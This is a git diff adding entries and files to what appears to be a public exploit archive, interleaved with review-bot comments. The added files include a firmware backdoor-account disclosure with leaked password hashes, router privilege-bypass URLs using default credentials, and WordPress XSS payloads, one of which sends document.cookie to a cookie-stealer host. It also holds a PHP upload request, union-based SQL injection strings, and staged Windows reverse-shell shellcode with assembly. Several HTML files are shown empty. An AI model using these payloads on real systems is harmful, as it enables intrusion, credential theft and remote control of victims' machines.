diff --git a/files.csv b/files.csv
index b363ee91b..4cde2ee9b 100644
--- a/files.csv
+++ b/files.csv
@@ -15304,6 +15304,8 @@ id,file,description,date,author,platform,type,port
41436,platforms/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Buffer Overflow (SEH)",2017-02-22,"Peter Baris",windows,remote,0
41443,platforms/macos/remote/41443.html,"macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read",2017-02-23,"Google Security Research",macos,remote,0
41471,platforms/arm/remote/41471.rb,"MVPower DVR TV-7104HE 1.8.4 115215B9 - Shell Unauthenticated Command Execution (Metasploit)",2017-02-27,Metasploit,arm,remote,0
+41479,platforms/windows/remote/41479.py,"SysGauge 1.5.18 - Buffer Overflow",2017-02-28,"Peter Baris",windows,remote,0
+41480,platforms/hardware/remote/41480.txt,"WePresent WiPG-1500 - Backdoor Account",2017-02-27,"Quentin Olagne",hardware,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -15924,6 +15926,7 @@ id,file,description,date,author,platform,type,port
41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Shellcode (130 bytes)",2017-02-26,"Krzysztof Przybylski",win_x86,shellcode,0
41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86_64 - Random Listener Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0
41477,platforms/linux/shellcode/41477.c,"Linux/x86-64 - Reverse Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",linux,shellcode,0
+41481,platforms/win_x86/shellcode/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@@ -37392,3 +37395,14 @@ id,file,description,date,author,platform,type,port
41466,platforms/java/webapps/41466.py,"Grails PDF Plugin 0.6 - XML External Entity Injection",2017-02-21,"Charles Fol",java,webapps,0
41470,platforms/php/webapps/41470.txt,"Joomla! Component OneVote! 1.0 - SQL Injection",2017-02-27,"Ihsan Sencan",php,webapps,0
41472,platforms/hardware/webapps/41472.html,"NETGEAR DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery",2017-02-28,SivertPL,hardware,webapps,0
+41478,platforms/hardware/webapps/41478.txt,"DLink DSL-2730U Wireless N 150 - Cross-Site Request Forgery",2017-03-01,"B GOVIND",hardware,webapps,0
+41482,platforms/xml/webapps/41482.txt,"Aruba AirWave 8.2.3 - XML External Entity Injection / Cross-Site Scripting",2017-03-01,"SEC Consult",xml,webapps,0
+41483,platforms/php/webapps/41483.html,"WordPress Plugin Contact Form Manager - Cross-Site Request Forgery / Cross-Site Scripting",2017-03-01,"Edwin Molenaar",php,webapps,80
+41484,platforms/php/webapps/41484.txt,"WordPress Plugin User Login Log 2.2.1 - Cross-Site Scripting",2017-03-01,"Axel Koolhaas",php,webapps,80
+41485,platforms/php/webapps/41485.html,"WordPress Plugin Popup by Supsystic 1.7.6 - Cross-Site Request Forgery",2017-03-01,"Radjnies Bhansingh",php,webapps,80
+41486,platforms/php/webapps/41486.txt,"WordPress Plugin NewStatPress 1.2.4 - Cross-Site Scripting",2017-03-01,"Han Sahin",php,webapps,80
+41487,platforms/php/webapps/41487.html,"WordPress Plugin Global Content Blocks 2.1.5 - Cross-Site Request Forgery",2017-03-01,"Yorick Koster",php,webapps,80
+41488,platforms/php/webapps/41488.html,"WordPress Plugin File Manager 3.0.1 - Cross-Site Request Forgery",2017-03-01,"David Vaartjes",php,webapps,80
+41489,platforms/php/webapps/41489.txt,"SchoolDir - SQL Injection",2017-03-01,"Ihsan Sencan",php,webapps,0
+41490,platforms/php/webapps/41490.txt,"Rage Faces Script 1.3 - SQL Injection",2017-03-01,"Ihsan Sencan",php,webapps,0
+41491,platforms/php/webapps/41491.txt,"Meme Maker Script 2.1 - 'user' Parameter SQL Injection",2017-03-01,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/hardware/remote/41480.txt b/platforms/hardware/remote/41480.txt
new file mode 100755
index 000000000..251f1638c
--- /dev/null
+++ b/platforms/hardware/remote/41480.txt
@@ -0,0 +1,23 @@
+# Exploit Title: CVE-2017-6351 - WePresent undocumented privileged manufacturer backdoor account
+# Date: 27/02/2017
+# Exploit Author: Quentin Olagne
+# Vendor Homepage: http://www.wepresentwifi.com/ or http://www.awindinc.com/products_wepresent_wipg_1500.html
+# Software Link: http://www.awindinc.com/products_wepresent_wipg_1500.html
+# Version: All versions of WiPG-1500 devices up to the latest firmware (1.0.3.7)
+# Tested on: Latest firmware (1.0.3.7) of WiPG-1500 device
+# CVE : CVE-2017-6351
+
+WiPG-1500 device embeds a firmware with a manufacturer account with hard coded username / password.
+Once the device is set in DEBUG mode, an attacker can connect to the device using telnet protocol and log in the device with the 'abarco' hard-coded manufacturer account.
+
+This account is not documented, neither the DEBUG feature nor the use of telnetd on a port TCP/5885 (when debug mode is ON).
+
+Here's the extract of the linux 'passwd' file:
+root:x:0:0:root:/home:/bin/sh
+abarco:x:1000:0:Awind-Barco User,,,:/home:/bin/sh
+
+and the 'shadow':
+root:$1$x1mFoD3w$uuvn.Z0p.XagX29uN3/Oa.:0:0:99999:7:::
+abarco:$1$JB0Pn5dA$sROUF.bZVoQSjVrV06fIx1:0:0:99999:7:::
+
+This vulnerability has been reported to the vendor but this product (WiPG-1500) is no longer maintained. This means it's a #WONTFIX vulnerability. Vendor has removed the 'abarco' account on the newest models but don't worry, DEBUG mode is still there with telnetd and you can also use the r00t account with a home and /bin/sh on the other systems in any case.
\ No newline at end of file
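Review bot: The advisory has no mitigation guidance even though L65 records the issue as WONTFIX, so an operator reading it is left without an action to take. A closing paragraph stating that DEBUG mode should stay disabled, that inbound TCP/5885 (L55) should be blocked at the network boundary, and that unmaintained units should be replaced would make the record actionable. Publishing the shadow hashes at L62-63 is not needed to establish the finding; the passwd entries at L58-59 already show the undocumented account, and a line noting that the hashes were withheld would suffice.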
diff --git a/platforms/hardware/webapps/41478.txt b/platforms/hardware/webapps/41478.txt
new file mode 100755
index 000000000..f09949705
--- /dev/null
+++ b/platforms/hardware/webapps/41478.txt
@@ -0,0 +1,120 @@
+Author : B GOVIND
+Exploit Title : DLink DSL-2730U Wireless N 150, Change DNS Configuration bypassing ‘admin’ privilege
+Date : 01-03-2017
+Vendor Homepage : http://www.dlink.co.in
+Firmware Link : ftp://support.dlink.co.in/firmware/DSL-2730U
+Affected version : Hardware ver C1, Firmware ver: IN_1.0.0
+Email id : govindnair7102@gmail.com
+CVE : CVE-2017-6411
+
+Change DNS Configuration Bypassing ‘admin’ Privilege
+-------------------------------------------------------
+
+D-Link DSL-2730U wireless router is a very popular SOHO network device used in India. This device has three default accounts ‘admin’, ‘support’ and ‘user’. As per D-Link only “admin" account has unrestricted access to change configuration of device. Account name ‘user’ can just view configuration settings and statistics.
+
+1. Description of Vulnerability
+
+Cross Site Request Forgery can be used to manipulate dnscfg.cgi in this device. An insider / external attacker (remote management to be enabled for external attacker) can change primary and secondary DNS IP address to some malicious IP address without using ‘admin’ account.
+
+2. Proof of Concept
+
+Use following URL to modify the DNS entries:
+
+ http://user:user@192.168.1.1/dnscfg.cgi?dnsPrimary=x.x.x.x&dnsSecondary=y.y.y.y&dnsIfcsList=&dnsRefresh=1
+
+ Here x.x.x.x and y.y.y.y are the malicious IP address attacker can use.
+
+
+
+3. Impact of vulnerability
+
+Information Disclosure: An attacker exploiting this vulnerability can obtain confidential information like users browsing profile. Modifying device DNS settings allows cybercriminals to perform malicious activities like the following:
+
+(a) Redirect user traffic to malicious/fake sites. These sites can be phishing pages that spoofs well-known sites and tricks users into submit sensitive user credentials like banks account username and password.
+
+(b) This can ensure that no more patches are updated from OS vendor sites or firewall sites.
+
+(c) Replace ads on legitimate sites and serve users with unwanted/fake ads.
+
+(d) Pushing malwares.
+
+4. Solution
+
+As per D-Link India this is the only no updated firmware is available for this hardware version which can mitigate this vulnerability which avoids privilege escalation.
+All users of this hardware should change default passwords of not just ‘admin’ account but also ‘user’ and ‘support’
+
+Change All Account Password Bypassing ‘admin’ Privilege
+----------------------------------------------------------
+
+ D-Link DSL-2730U wireless router is a very popular SOHO network device used in India. This device has three default accounts ‘admin’, ‘support’ and ‘user’. As per D-Link only “admin" account has unrestricted access to change configuration of device. Account name ‘user’ can just view configuration settings and statistics. Default password of admin, support and user account are admin, support and user respectively.
+
+1. Description of Vulnerability
+
+ Cross Site Request Forgery can be used to manipulate password.cgi in this device. An insider / external attacker (remote management to be enabled for external attacker) can change password of all the three accounts without using ‘admin’ account.
+
+2. Proof of Concept
+
+This exploit works only when accounts are using default password.
+
+Use following URL to change ‘admin’ account password from ‘admin’ to
+‘admin1’.
+
+ http://user:user@192.168.1.1/password.cgi?
+inUserName=admin&inPassword=ZGFyZWFkbWluMQ==&inOrgPassword=ZGFyZWFkbWlu
+
+(b) Use following URL to change ‘support’ account password from ‘support’ to
+‘support1’.
+
+http://user:user@192.168.1.1/password.cgi?
+inUserName=support&inPassword=ZGFyZXN1cHBvcnQx&inOrgPassword=ZGFyZXN1cHBvcnQ=
+
+(c) Use following URL to change ‘user’ account password from ‘user’ to
+‘user1’.
+
+http://user:user@192.168.1.1/password.cgi?
+inUserName=user&inPassword=ZGFyZXVzZXIx&inOrgPassword=ZGFyZXVzZXI=
+
+Here ‘inPassword’ is the new password and ‘inOrgPassword’ is the existing password. Both these password strings are base64 encoded for confidentiality as connection between browser and web server is using http.
+
+
+3. Impact of vulnerability
+
+Elevation of privilege, Information Disclosure, Denial Of service
+
+(a) Insider/Attacker can change the passwords of all the existing accounts and control the device as required. This will result in attacker having complete control over the device. He can capture traffic of other user and analyse traffic. Attacker can deny services as per his/her choice.
+
+4. Solution
+
+ As per D-Link India this is the only no updated firmware available for this hardware version which can mitigate this vulnerability. All users of this hardware should change default passwords of all the default accounts.
+
+
+Enable/Disable LAN side Firewall without admin privilege
+---------------------------------------------------------
+
+ D-Link DSL-2730U wireless router is a very popular SOHO network device used in India. This device has three default accounts ‘admin’, ‘support’ and ‘user’. As per D-Link only “admin" account has unrestricted access to change configuration of device. Account name ‘user’ can just view configuration settings and statistics. Default password of admin, support and user account are admin, support and user respectively.
+
+1. Description of Vulnerability
+
+ Cross Site Request Forgery can be used to manipulate lancfg2.cgi in this device. An insider / external attacker (remote management to be enabled for external attacker) can enable/disable LAN side firewall without ‘admin’ privilege using ‘user ‘ account.
+
+2. Proof of Concept
+
+ Use following URL to enable LAN side firewall
+
+ http://user:user@192.168.1.1/lancfg2.cgi?ethIpAddress=192.168.1.1ð SubnetMask=255.255.255.0&enblLanFirewall=1&enblIgmpSnp=0&enblIgmpMode=0&dhcpEthStart=192.168.1.2&dhcpEthEnd=192.168.1.254&dhcpLeasedTime=86400&enblDhcpSrv=1&enblLan2=0&enblLanDns=0
+
+
+
+Use following URL to disable LAN side firewall
+
+http://user:user@192.168.1.1/lancfg2.cgi?ethIpAddress=192.168.1.1ðSubnetMask=255.255.255.0&enblLanFirewall=0&enblIgmpSnp=0&enblIgmpMode=0&dhcpEthStart=192.168.1.2&dhcpEthEnd=192.168.1.254&dhcpLeasedTime=86400&enblDhcpSrv=1&enblLan2=0&enblLanDns=0
+
+
+3. Impact of vulnerability
+
+By disabling LAN side firewall and by enabling Port Triggering, an attacker can ensure a backdoor access within LAN side as well as from WAN side.
+Attacker can run port scanning tools to map services which otherwise wont be possible with firewall enabled.
+
+4. Solution
+
+ As per D-Link India this is the only no updated firmware available for this hardware version which can mitigate this vulnerability. All users of this hardware should change default passwords of all the default accounts.
\ No newline at end of file
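Review bot: The three findings are labelled Cross-Site Request Forgery, but every PoC URL (L95, L134, L140, L146, L176, L182) authenticates directly as the low-privilege 'user' account, so what the PoCs actually demonstrate is missing server-side authorization on dnscfg.cgi, password.cgi and lancfg2.cgi (a vertical privilege escalation), with CSRF only a delivery vector on top of it. This matters for the Solution sections (L115-116, L160, L192): changing default passwords removes the credential part, but a reader should be told that the authorization flaw itself remains in firmware IN_1.0.0. I'd add one sentence under each "Description of Vulnerability" heading making that distinction explicit.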
diff --git a/platforms/php/webapps/41483.html b/platforms/php/webapps/41483.html
new file mode 100755
index 000000000..c4fa6b41b
--- /dev/null
+++ b/platforms/php/webapps/41483.html
@@ -0,0 +1,53 @@
+
+
+
+
+
+
+
+
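Review bot: The hunk header at L199 declares 53 added lines but only blank lines survive, so the stored copy of 41483.html is empty and the record cannot be reviewed; the same applies to 41485.html (L271-278, 151 lines declared), 41487.html (L338-345, 46 declared) and 41488.html (L351-381, 68 declared, where only a raw POST body remains and the HTML form around it is missing). This looks like markup stripped during import rather than an intentional change; the files should be re-imported from the original submissions before the files.csv entries at L28, L30, L32 and L33 point readers to them.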
diff --git a/platforms/php/webapps/41484.txt b/platforms/php/webapps/41484.txt
new file mode 100755
index 000000000..86199a0de
--- /dev/null
+++ b/platforms/php/webapps/41484.txt
@@ -0,0 +1,53 @@
+Source: https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_vulnerability_in_user_login_log_wordpress_plugin.html
+
+Abstract
+A stored Cross-Site Scripting vulnerability was found in the User Login Log WordPress Plugin. This issue can be exploited by Subscriber (or higher) and allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf.
+
+Contact
+For feedback or questions about this advisory mail us at sumofpwn at securify.nl
+
+The Summer of Pwnage
+This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
+
+OVE ID
+OVE-20160724-0011
+
+Tested versions
+This issue was successfully tested on User Login Log WordPress Plugin version 2.2.1.
+
+Fix
+There is currently no fix available.
+
+Introduction
+The User Login Log WordPress Plugin track records of WordPress user login with set of multiple information like ip, date , time, country , city, and user name. A stored Cross-Site Scripting vulnerability was found in the User Login Log WordPress Plugin. This issue can be exploited by Subscriber (or higher) and allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf.
+
+Details
+This vulnerability exists due to the lack of encoding of the User-Agent HTTP request header. This issue exists in method column_default() that is implemented in the file user-login-log.php.
+
+function column_default($item, $column_name)
+{
+
+[...]
+
+ switch($column_name){
+
+[...]
+
+ default:
+ return $item[$column_name];
+ }
+}
+Proof of concept:
+
+POST /wp-login.php HTTP/1.1
+Host:
+User-Agent: XSSXSS
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.8
+Accept-Encoding: gzip,deflate,lzma,sdch
+Cookie: wordpress_test_cookie=WP+Cookie+check
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+
+log=&pwd=&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1
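Review bot: The Details section (L238-252) identifies the unencoded User-Agent value in column_default() but never states the corrective change, and L232 says no fix is available. For a WP_List_Table default branch the minimal fix is `return esc_html($item[$column_name]);` on L250 (or escaping at the point the header is stored); stating it would let site owners patch locally while the plugin is unmaintained. The `Host:` header at L256 is empty, which is presumably a redaction but should be marked as such so the request is not mistaken for an incomplete capture.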
diff --git a/platforms/php/webapps/41485.html b/platforms/php/webapps/41485.html
new file mode 100755
index 000000000..4ba054f51
--- /dev/null
+++ b/platforms/php/webapps/41485.html
@@ -0,0 +1,151 @@
+
+
+
+
+
+
+
diff --git a/platforms/php/webapps/41486.txt b/platforms/php/webapps/41486.txt
new file mode 100755
index 000000000..adf03b27a
--- /dev/null
+++ b/platforms/php/webapps/41486.txt
@@ -0,0 +1,48 @@
+Source: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_the_wordpress_newstatpress_plugin.html
+
+Abstract
+A persistent Cross-Site Scripting (XSS) vulnerability has been found in the WordPress NewStatPress plugin. By using this vulnerability an attacker can inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.
+
+Contact
+For feedback or questions about this advisory mail us at sumofpwn at securify.nl
+
+The Summer of Pwnage
+This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
+
+OVE ID
+OVE-20160712-0030
+
+Tested versions
+This issue was successfully tested on WordPress NewStatPress plugin version 1.2.4.
+
+Fix
+This issue has been addressed in NewStatPress version 1.2.5. This version can be download from the NewStatPress GitHub account: https://github.com/lechab/newstatpress#125
+
+Introduction
+The WordPress NewStatPress plugin is a real-time plugin to manage the visits' statistics on a WordPress site. It doesn't require external web analytics. A persistent Cross-Site Scripting vulnerability has been discovered in the WordPress NewStatPress plugin which allows an unauthenticated attacker to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content. The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes or deliver malware.
+
+Details
+The WordPress NewStatPress plugin fails to sufficiently check input supplied to a GET request for a resource on a WordPress site with a vulnerable version of the NewStatPress plugin. In addition input supplied to the Referer header is insufficiently sanitized. As a result a malicious request will be stored on the Last Visitors and Visitors tab of the Visits page, executing the payload when an unsuspecting user views one of the mentioned tabs on this page.
+
+Persistent Cross-Site Scripting vulnerabilities are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, in this case potentially a WP admin reviewing the stats.
+
+Proof of concept
+This vulnerability can be demonstrated by submitting the following request:
+
+GET /sumofpwn/"> HTTP/1.1
+Host: 192.168.28.129
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla Chrome/51.0.2704.103 Safari/537.36
+Referer: javascript:document.location=`http://www.XXXXXXyourhackerdomainXXXXXX.nl/demo/xss/cookiestealer.php?c=`+encodeURIComponent(document.cookie);
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate, sdch
+Accept-Language: en-US,en;q=0.8,nl;q=0.6
+Connection: close
+
+Based on the above request, the vulnerable output will be:
+
+1) " target="_blank">/sumofpwn/\">
+2) Arrived from javascript:document.location=`http://www.sfylabs.nl/demo/xss/cookiestealer.php?c=`+encodeURIComponent(document.cookie);
+
+http://yourhost/wp-admin/admin.php?page=nsp_main
+http://yourhost/wp-admin/admin.php?page=nsp_visits
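Review bot: The stored output at L329 shows `www.sfylabs.nl`, while the request at L320 uses the placeholder `www.XXXXXXyourhackerdomainXXXXXX.nl`, so the request and the observed output no longer correspond; presumably the request was redacted after capture and the output was not. One of the two should be aligned so the proof of concept is internally consistent. The Fix line at L303 is the part most useful to site owners and would be better placed next to the Abstract rather than after the event description.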
diff --git a/platforms/php/webapps/41487.html b/platforms/php/webapps/41487.html
new file mode 100755
index 000000000..46268170a
--- /dev/null
+++ b/platforms/php/webapps/41487.html
@@ -0,0 +1,46 @@
+
+
+
+
+
+
+
diff --git a/platforms/php/webapps/41488.html b/platforms/php/webapps/41488.html
new file mode 100755
index 000000000..472dcdeac
--- /dev/null
+++ b/platforms/php/webapps/41488.html
@@ -0,0 +1,68 @@
+
+
+POST /wp-admin/admin-ajax.php HTTP/1.1
+Host:
+Cookie: ALL_YOUR_WP_COOKIES
+Connection: close
+Content-Type: multipart/form-data; boundary=---------------------------6427194103423794601262893907
+
+-----------------------------6427194103423794601262893907
+Content-Disposition: form-data; name="cmd"
+
+upload
+-----------------------------6427194103423794601262893907
+Content-Disposition: form-data; name="target"
+
+l1_d3AtY29udGVudC91cGxvYWRzL2ZpbGUtbWFuYWdlcg
+-----------------------------6427194103423794601262893907
+Content-Disposition: form-data; name="suffix"
+
+~
+-----------------------------6427194103423794601262893907
+Content-Disposition: form-data; name="action"
+
+connector
+-----------------------------6427194103423794601262893907
+Content-Disposition: form-data; name="upload[]"; filename="info.php"
+Content-Type: text/php
+
+
+-----------------------------6427194103423794601262893907--
diff --git a/platforms/php/webapps/41489.txt b/platforms/php/webapps/41489.txt
new file mode 100755
index 000000000..a8a4c8725
--- /dev/null
+++ b/platforms/php/webapps/41489.txt
@@ -0,0 +1,20 @@
+# # # # #
+# Exploit Title: SchoolDir - SQL Injection
+# Google Dork: N/A
+# Date: 01.03.2017
+# Vendor Homepage: http://www.brynamics.xyz/
+# Software: https://codecanyon.net/item/schooldir/19326269
+# Demo: http://www.brynamics.xyz/schooldir/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search?searchItem=[SQL]&criteria=schools
+# http://localhost/[PATH]/sortsearch?School_type=[SQL]&fees=2&ownership=federal&location=Nigeria&searchItem=Harvard+University&criteria=schools
+# If you don't know to use the vulnerabilities, you don't need to check it.
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41490.txt b/platforms/php/webapps/41490.txt
new file mode 100755
index 000000000..0cc1fe5cd
--- /dev/null
+++ b/platforms/php/webapps/41490.txt
@@ -0,0 +1,21 @@
+# # # # #
+# Exploit Title: Rage Faces Script v1.3 - SQL Injection
+# Google Dork: N/A
+# Date: 01.03.2017
+# Vendor Homepage: http://www.memesoftware.com/
+# Software: http://www.memesoftware.com/ragefaces.php
+# Demo: http://ragefaces.memesoftware.com/
+# Version: 1.3
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/face.php?face=[SQL]
+-2')+/*!50000union*/+select+1,2,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),4,5-- -
+# http://localhost/[PATH]/create.php?create=[SQL]
+-1'+/*!50000union*/+Select+(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),2,3,4,5,6,7,8,9-- -
+# Etc...
+# # # # #
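Review bot: The lines at L431 and L433 are the only lines in the file without the leading `# ` that every other line uses (compare the same author's 41491.txt, where the equivalent line at L458 is prefixed), so the record's own comment convention is broken. Prefixing them with `# ` would make it clear they belong to the injection-point description above them rather than being separate content. The Version (L422) and Tested on (L423) fields are filled in here, whereas 41489.txt gives `N/A` for Version at L395; the SchoolDir record would benefit from the same level of detail.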
diff --git a/platforms/php/webapps/41491.txt b/platforms/php/webapps/41491.txt
new file mode 100755
index 000000000..e265816e6
--- /dev/null
+++ b/platforms/php/webapps/41491.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Meme Maker Script 2.1 - SQL Injection
+# Google Dork: N/A
+# Date: 01.03.2017
+# Vendor Homepage: http://www.memesoftware.com/
+# Software: http://www.memesoftware.com/mememaker.php
+# Demo: http://www.memefaces.me/
+# Version: 2.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/profil.php?user=[SQL]
+# -2'+/*!50000union*/+select+1,2,3,4,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),6,7-- -
+# Etc...
+# # # # #
diff --git a/platforms/win_x86/shellcode/41481.asm b/platforms/win_x86/shellcode/41481.asm
new file mode 100755
index 000000000..0ab00bdf8
--- /dev/null
+++ b/platforms/win_x86/shellcode/41481.asm
@@ -0,0 +1,344 @@
+########### Windows x86 Reverse TCP Staged Alphanumeric Shellcode CreateProcessA cmd.exe ########
+ ########### Author: Snir Levi, Applitects #############
+ ## 332 Bytes ##
+ ## For Educational Purposes Only ##
+
+Date: 01.03.17
+Author: Snir Levi
+Email: snircontact@gmail.com
+https://github.com/snir-levi/
+
+IP - 127.0.0.1
+PORT - 4444
+
+Tested on:
+Windows 7
+Windows 10
+ ###Usage###
+ Victim Executes the first stage shellcode, and opens tcp connection
+ After Connection is established, send the Alphanumeric stage to the connection
+
+ nc -lvp 4444
+ connect to [127.0.0.1] from localhost [127.0.0.1] (port)
+ RPhoceshtePrhCreaTQPXLLLLLLLLYFFFFPXNNNNj0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHPhessAhProchExitTQPXFFFFFFFFPXZZZZZZZZZZj0YIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIITXQQQQWWWQQBRQQQQQQQQQQjDTZhexeChcmd.TYPRj0ZJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJRRRBRJRRQRAAAAAAANNNNS
+
+ Microsoft Windows [Version 10.0.14393]
+ (c) 2016 Microsoft Corporation. All rights reserved.
+
+ C:\Users\>
+ ###########
+
+
+
+##Shellcode##
+
+
+#### Second Stage Alphanumeric shellcode: #####
+
+RPhoceshtePrhCreaTQPXLLLLLLLLYFFFFPXNNNNj0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHPhessAhProchExitTQPXFFFFFFFFPXZZZZZZZZZZj0YIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIITXQQQQWWWQQBRQQQQQQQQQQjDTZhexeChcmd.TYPRj0ZJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJRRRBRJRRQRAAAAAAANNNNS
+
+
+R push edx
+P push eax
+hoces push 0x7365636f //oces
+htePr push 0x72506574 //tePr
+hCrea push 0x61657243 //Crea
+T push esp
+Q push ecx
+PX will be replaced with call [esi] (0x16ff)
+L*8 dec esp // offset esp to kernel32.dll Address
+Y pop ecx // ecx = kernel32
+F*4 inc esi -> offset [esi+4]
+PX will be replaced with mov [esi],eax (0x0689)
+N*4 dec esi -> offset [esi]
+j0 push 0x30
+X pop eax
+H*48 dec eax // zeroing eax
+P push eax
+hessA push 0x41737365 //essA (will be null terminated)
+hProc push 0x636f7250 //Proc
+hExit push 0x74697845 //Exit
+T push esp
+Q push ecx
+PX will be replaced with call [esi] (0x16ff)
+F*8 inc esi -> offset [esi+8]
+PX will be replaced with mov [esi],eax (0x0689)
+Z*10 offset stack to &processinfo
+j0 push 0x30
+Y pop ecx
+I*48 dec ecx // zeroing ecx
+T push esp
+X pop eax //eax = &PROCESS_INFORMATION
+Q*4 push ecx //sub esp,16
+W push edi
+W push edi
+W push edi
+Q push ecx
+Q push ecx
+B inc edx
+R push edx
+Q*10 push ecx
+jD push 0x44
+T push esp
+Z pop edx //edx = &STARTUPINFOA
+hexeC push 0x65
+hcmd. push 0x78652e64
+T push esp // &'cmd.exe'
+Y pop ecx
+P push eax // &PROCESS_INFORMATION
+R push edx // &STARTUPINFOA
+j0 push 0x30
+Z pop edx
+J*48 dec edx // zeroing edx
+R*3 push edx
+B inc edx
+R push edx
+J dec edx
+R*2 push edx
+Q push ecx ; &'cmd.exe'
+R push edx
+A*7 inc ecx //offset ecx to [C]exeh -> will be null terminated
+N*4 dec esi //offset [esi+4] to CreateProccesA
+S push ebx ; return address
+
+
+
+## First Stage Shellcode ##
+
+
+global _start
+
+section .text
+
+
+_start:
+ xor eax,eax
+ push eax ; null terminator for createProcA
+
+ mov eax,[fs:eax+0x30] ; Proccess Enviroment Block
+ mov eax,[eax+0xc]
+ mov esi,[eax+0x14]
+ lodsd
+ xchg esi,eax
+ lodsd
+ mov ebx,[eax+0x10] ; kernel32
+
+ mov ecx,[ebx+0x3c] ; DOS->elf_anew
+ add ecx, ebx; Skip to PE start
+ mov ecx, [ecx+0x78] ; offset to export table
+ add ecx,ebx ; kernel32 image_export_dir
+
+ mov esi,[ecx+0x20] ; Name Table
+ add esi,ebx
+
+ xor edx,edx
+
+ getProcAddress:
+ inc edx
+ lodsd
+ add eax,ebx
+ cmp dword [eax],'GetP'
+ jne getProcAddress
+ cmp dword [eax+4],'rocA'
+ jne getProcAddress
+
+ ;---Function Adresses Chain----
+ ;[esi] GetProcAddress
+ ;[esi+12] WSAstartup
+ ;[esi+16] WSASocketA
+ ;[esi+20] connect
+ ;[esi+24] recv
+ ;[esi+28] kernel32
+
+ ;Alphanumeric stage store:
+ ;[esi+4] CreateProcessA
+ ;[esi+8] ExitProccess
+
+
+ mov esi,[ecx+0x1c] ; Functions Addresses Chain
+ add esi,ebx
+ mov edx,[esi+edx*4]
+ add edx,ebx ; GetProcAddress
+
+ sub esp, 32 ; Buffer for the function addresses chain
+ push esp
+ pop esi
+ mov [esp],edx ; esi offset 0 -> GetProcAddress
